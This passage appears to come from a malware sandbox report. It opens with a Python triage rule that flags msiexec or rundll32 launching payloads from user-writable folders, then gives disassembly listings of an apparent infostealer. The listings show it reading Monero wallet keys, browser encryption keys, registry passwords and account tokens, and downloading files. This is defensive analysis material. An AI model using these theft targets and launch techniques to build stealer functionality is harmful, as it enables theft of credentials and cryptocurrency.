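# Executables named verbatim in the block's String ID line.
MSIEXEC = r"C:\Windows\system32\msiexec.exe"
RUNDLL32 = r"C:\Windows\system32\rundll32.exe"

def build_launch(payload_path: str) -> tuple[str, str]:
    """Pick executable and parameters the way the strings suggest:
    '.msi' -> msiexec /i "<path>" /passive, '.dll' -> rundll32 "<path>",
    anything else runs directly. No rundll32 entry point is visible in the
    strings, so none is passed here (assumption)."""
    lower = payload_path.lower()
    if lower.endswith(".msi"):
        return MSIEXEC, f'/i "{payload_path}" /passive'
    if lower.endswith(".dll"):
        return RUNDLL32, f'"{payload_path}"'
    return payload_path, ""

# Locations a non-admin process can write to (heuristic, assumption).
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\|[a-z]:\\programdata\\|[a-z]:\\windows\\temp\\)", re.I)

# Argument shapes from the strings: '/i "' ... '" /passive', and a quoted or bare .dll path.
MSI_INSTALL = re.compile(r'msiexec(?:\.exe)?"?\s+/i\s+"([^"]+\.msi)"\s+/passive\b', re.I)
DLL_LOAD = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",\s]+\.dll)"?', re.I)

@dataclass
class Verdict:
    technique: str       # "msiexec-install" or "rundll32-load"
    payload: str         # path the launcher was given
    user_writable: bool  # payload sits where a dropper could have written it

def classify_cmdline(cmdline: str) -> Optional[Verdict]:
    """Return what the command line does, or None if it matches neither shape."""
    m = MSI_INSTALL.search(cmdline)
    if m:
        return Verdict("msiexec-install", m.group(1), bool(USER_WRITABLE.match(m.group(1))))
    m = DLL_LOAD.search(cmdline)
    if m:
        return Verdict("rundll32-load", m.group(1), bool(USER_WRITABLE.match(m.group(1))))
    return None

def is_suspicious(cmdline: str) -> bool:
    """Triage rule: launcher shape seen above AND payload in a user-writable path."""
    v = classify_cmdline(cmdline)
    return v is not None and v.user_writable

# Constructed process command lines: two built the way the function would, two benign.
SAMPLES = {
    "dropped msi": '"%s" %s' % build_launch(r"C:\Users\user\AppData\Local\Temp\update.msi"),
    "dropped dll": '"%s" %s' % build_launch(r"C:\Users\user\AppData\Local\Temp\x.dll"),
    "vendor install": r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi" /qn',
    "system rundll32": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:16} suspicious={is_suspicious(cmd)}  {classify_cmdline(cmd)}")
```

The rule is a triage heuristic, not a signature: `/passive` on a user-writable `.msi` is rare for legitimate software but not impossible, and a loader that copies the payload under `Program Files` first would pass it. In practice the shape check is combined with the parent process (here the stealer itself rather than an installer or Explorer), which this listing does not record.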
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC6280: InternetOpenA.WININET(00DE0DFE,00000001,00000000,00000000,00000000), ref: 00DC62E1
                                  • Part of subcall function 00DC6280: StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC6303
                                  • Part of subcall function 00DC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC6335
                                  • Part of subcall function 00DC6280: HttpOpenRequestA.WININET(00000000,GET,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC6385
                                  • Part of subcall function 00DC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DC63BF
                                  • Part of subcall function 00DC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC63D1
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD5318
                                • lstrlen.KERNEL32(00000000), ref: 00DD532F
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00DD5364
                                • lstrlen.KERNEL32(00000000), ref: 00DD5383
                                • lstrlen.KERNEL32(00000000), ref: 00DD53AE
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 576b7ea911509eefc1d38380079e15f4217d5dbd6ed4b6bb433e2e47ed8ab86b
                                • Instruction ID: 12623b8ac53e3fdbb64c2ca48ba32995991021728e2a3b390e964578ba3a5365
                                • Opcode Fuzzy Hash: 576b7ea911509eefc1d38380079e15f4217d5dbd6ed4b6bb433e2e47ed8ab86b
                                • Instruction Fuzzy Hash: 0B510D30950149ABCB14FF68D996EED7779EF10300F508119F80A5B292EF34AB46DB72
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 56818c83e133ee8e9d143cf32ece2b47e63db6ac80d0ab48580d58eb35d40c0d
                                • Instruction ID: b8ea091eab2000ae4300d8102ae6ad97dfead833515e45f7c6ed75329f70851d
                                • Opcode Fuzzy Hash: 56818c83e133ee8e9d143cf32ece2b47e63db6ac80d0ab48580d58eb35d40c0d
                                • Instruction Fuzzy Hash: 95C1C5B5A00218ABCB14EF60DC89FEA7778FF54304F004599F50AA7241EB75AA85DFB1
                                APIs
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD42EC
                                • lstrcat.KERNEL32(?,0162E338), ref: 00DD430B
                                • lstrcat.KERNEL32(?,?), ref: 00DD431F
                                • lstrcat.KERNEL32(?,0162D530), ref: 00DD4333
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DD8D90: GetFileAttributesA.KERNEL32(00000000,?,00DC1B54,?,?,00DE564C,?,?,00DE0E1F), ref: 00DD8D9F
                                  • Part of subcall function 00DC9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DC9D39
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                  • Part of subcall function 00DD93C0: GlobalAlloc.KERNEL32(00000000,00DD43DD,00DD43DD), ref: 00DD93D3
                                • StrStrA.SHLWAPI(?,0162E2F0), ref: 00DD43F3
                                • GlobalFree.KERNEL32(?), ref: 00DD4512
                                  • Part of subcall function 00DC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9AEF
                                  • Part of subcall function 00DC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B01
                                  • Part of subcall function 00DC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9B2A
                                  • Part of subcall function 00DC9AC0: LocalFree.KERNEL32(?,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD44A3
                                • StrCmpCA.SHLWAPI(?,00DE08D1), ref: 00DD44C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00DD44D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00DD44E5
                                • lstrcat.KERNEL32(00000000,00DE0FB8), ref: 00DD44F4
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: dad2f3143a395b35a54e81caaaf641f0abfa27f446163a2a7f4993c75eb9fedb
                                • Instruction ID: f6e3b7bebe48af28e4ac526fcd0222a04326c7c9d7d46e7a880994b11c6cc7aa
                                • Opcode Fuzzy Hash: dad2f3143a395b35a54e81caaaf641f0abfa27f446163a2a7f4993c75eb9fedb
                                • Instruction Fuzzy Hash: 767174B6A00208ABCB15FBA0DC95FEE7379EB48300F048599F60597181EA75DB49CFB1
                                APIs
                                  • Part of subcall function 00DC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DC12B4
                                  • Part of subcall function 00DC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00DC12BB
                                  • Part of subcall function 00DC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DC12D7
                                  • Part of subcall function 00DC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DC12F5
                                  • Part of subcall function 00DC12A0: RegCloseKey.ADVAPI32(?), ref: 00DC12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00DC134F
                                • lstrlen.KERNEL32(?), ref: 00DC135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00DC1377
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00DC1465
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00DC14EF
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: b06c959672b53c7289d68fb46a0922e36dff31b4a495e4e0a7275ca83f15caf5
                                • Instruction ID: 361322f4c85e54122690198fd09572f9c29a16a3ffa98eeaadd72b2f4fd989b6
                                • Opcode Fuzzy Hash: b06c959672b53c7289d68fb46a0922e36dff31b4a495e4e0a7275ca83f15caf5
                                • Instruction Fuzzy Hash: CB5132B19502199BCB25FB64DC92FED733CEF54700F408199B60A62182EE746B89CFB5
                                APIs
                                  • Part of subcall function 00DC72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DC733A
                                  • Part of subcall function 00DC72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DC73B1
                                  • Part of subcall function 00DC72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DC740D
                                  • Part of subcall function 00DC72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00DC7452
                                  • Part of subcall function 00DC72D0: HeapFree.KERNEL32(00000000), ref: 00DC7459
                                • lstrcat.KERNEL32(00000000,00DE17FC), ref: 00DC7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00DC7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00DC765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00DC768F
                                • lstrcat.KERNEL32(00000000,00DE1804), ref: 00DC76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00DC76D3
                                • lstrcat.KERNEL32(00000000,00DE1808), ref: 00DC76ED
                                • task.LIBCPMTD ref: 00DC76FB
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: fa7d201298e426259f568843d05602aa8b6821267650b5c217f686b04cc381c6
                                • Instruction ID: 0ea7abba31dfbfdd4e1da13b35fcfb742ab40356e90f9c93914073fa851c9020
                                • Opcode Fuzzy Hash: fa7d201298e426259f568843d05602aa8b6821267650b5c217f686b04cc381c6
                                • Instruction Fuzzy Hash: 5F312D75A0420ADFCB55EBA4DC95EEE7779EB88301F204118F142A7284DA39E946DB70
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                  • Part of subcall function 00DC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                • InternetOpenA.WININET(00DE0DF7,00000001,00000000,00000000,00000000), ref: 00DC610F
                                • StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00DC618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00DC61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00DC61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DC620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00DC6249
                                • InternetCloseHandle.WININET(?), ref: 00DC6253
                                • InternetCloseHandle.WININET(00000000), ref: 00DC6260
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 24b4db6b79ab83adad7eee0fda3ec4c908f3390ed55d83c69e2a55ccb32361d4
                                • Instruction ID: 7c668ea987928388b28471249a462defe67fd4d968a9e9aa72898584b5eb3305
                                • Opcode Fuzzy Hash: 24b4db6b79ab83adad7eee0fda3ec4c908f3390ed55d83c69e2a55ccb32361d4
                                • Instruction Fuzzy Hash: 4D515EB1A40219ABDB20DF50DC45FEE77B8FF44701F108099A649A7180DB75AA85CFA9
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DC733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DC73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DC740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00DC7452
                                • HeapFree.KERNEL32(00000000), ref: 00DC7459
                                • task.LIBCPMTD ref: 00DC7555
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: f34e7a3f82782752cd8c06e3638aa6d29cc5bada7b453f83b6ffb7a47dfa7076
                                • Instruction ID: 0cfff2bcc9944d7acf878e9d4e8b9d6eb10fb2d3159aabd8f79039c2c25d4e23
                                • Opcode Fuzzy Hash: f34e7a3f82782752cd8c06e3638aa6d29cc5bada7b453f83b6ffb7a47dfa7076
                                • Instruction Fuzzy Hash: 0E61F7B59142699BDB24DB50CC55FDAB7B8FB44300F0481E9E689A7141DBB06BC9CFB0
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                • lstrlen.KERNEL32(00000000), ref: 00DCBC9F
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00DCBCCD
                                • lstrlen.KERNEL32(00000000), ref: 00DCBDA5
                                • lstrlen.KERNEL32(00000000), ref: 00DCBDB9
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 90b8ac32c6c8d2eb2bdf3b0765225c9f80fb52ba3a50f73b87a4c4180eaf83c4
                                • Instruction ID: 17981b849b34dc3e130653e522561d2820a345285d5d185c3b93983802d3b601
                                • Opcode Fuzzy Hash: 90b8ac32c6c8d2eb2bdf3b0765225c9f80fb52ba3a50f73b87a4c4180eaf83c4
                                • Instruction Fuzzy Hash: 46B14F71910118ABDB14FBA4DC96EEE733CEF54300F40816AF506A3291EF346A49CBB2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 02c9cc84cf82c91811c7f1c755fa3696a73e055479e73a559ec10b88722650a3
                                • Instruction ID: f00ff4b11cd606e3e39e28825da75a8c9fca02e574a4844f72c6a8e05d22c584
                                • Opcode Fuzzy Hash: 02c9cc84cf82c91811c7f1c755fa3696a73e055479e73a559ec10b88722650a3
                                • Instruction Fuzzy Hash: 83F05E30A04309EFD3559FE0E90976C7B70FB04703F0441A9E64A87785D67A8B419BE5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DC4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC4FD1
                                • InternetOpenA.WININET(00DE0DDF,00000000,00000000,00000000,00000000), ref: 00DC4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00DC5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00DC5041
                                • InternetCloseHandle.WININET(?), ref: 00DC50B9
                                • InternetCloseHandle.WININET(?), ref: 00DC50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 081fd8ca4466017a0bf9eb8c5ced97925d632b776c5dc121b8b6f29a33cb3446
                                • Instruction ID: 5c9e13f5e0e85b5bed0747d7f40356615998c7b5f90aba06f3a32ec76f23bd51
                                • Opcode Fuzzy Hash: 081fd8ca4466017a0bf9eb8c5ced97925d632b776c5dc121b8b6f29a33cb3446
                                • Instruction Fuzzy Hash: 7A3105B4A00218EBDB20CF54DC85BDCB7B4FB48704F1081D9EA09A7285DB756AC58FA8
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0162E128,00000000,?,00DE0E2C,00000000,?,00000000), ref: 00DD8130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD8137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00DD8158
                                • wsprintfA.USER32 ref: 00DD81AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2922868504-3474575989
                                • Opcode ID: d11ff88de45ca0dbd309fbb17056627095e2dfbf00f46cf14bda49e120192a75
                                • Instruction ID: 3b1996aadbb65da924eba46f15a5cf8ea348ac3b6d5f3ae556f19dc10fc15e34
                                • Opcode Fuzzy Hash: d11ff88de45ca0dbd309fbb17056627095e2dfbf00f46cf14bda49e120192a75
                                • Instruction Fuzzy Hash: 102129B1E44318ABDB10DFD4CC49FAEB7B8FB44B10F104209F605AB284C77969058BB4
                                APIs
